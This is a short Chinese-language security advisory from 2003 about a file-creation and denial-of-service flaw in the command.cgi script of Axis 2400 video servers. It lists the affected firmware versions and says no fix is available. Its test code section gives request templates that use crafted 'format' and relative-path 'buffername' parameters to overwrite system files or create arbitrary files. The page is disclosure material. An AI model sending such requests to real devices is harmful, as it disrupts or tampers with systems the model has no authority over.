Axis Communications 2400 Video Server Command.CGI文件建立漏洞

发布时间：2003-02-28
更新时间：2003-02-28
严重程度：中
威胁程度：远程拒绝服务
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：6987

受影响系统

Axis Communications 2400 Video Server 2.20
Axis Communications 2400 Video Server 1.10
Axis Communications 2400 Video Server 1.02
Axis Communications 2400 Video Server 1.01
Axis Communications 2400 Video Server 1.11
Axis Communications 2400 Video Server 1.12
Axis Communications 2400 Video Server 1.15
Axis Communications 2400 Video Server 2.31
Axis Communications 2400 Video Server 2.32
Axis Communications 2400 Video Server 2.33

详细描述
Axis Communications 2400视频服务器不正确处理提交给'command.cgi'脚本的参数，攻击者可以提交恶意参数而对系统进行拒绝服务/覆盖系统文件，或者写任何系统文件等恶意活动。

测试代码
DOS / OVERWRITING SYSTEM-FILES
requesting:
---*---
http://server/axis-cgi/buffer/command.cgi?
buffername=X&
prealarm=1&
postalarm=1&
do=start&
uri=/jpg/quad.jpg&
format=[bad input]
---*---

或者建立任意文件：

---*---
/axis-cgi/buffer/command.cgi?whatever params
buffername=[relative path to directory]
format=[relative path to arbitrary file name]
---*---

解决方案
尚无

相关信息
参考：http://www.securityfocus.com/archive/1/313485
相关主页：http://www.axis.com/products/camera_servers/index.htm

最近严重漏洞

Axis Communications 2400 Video Server Command.CGI文件建立漏洞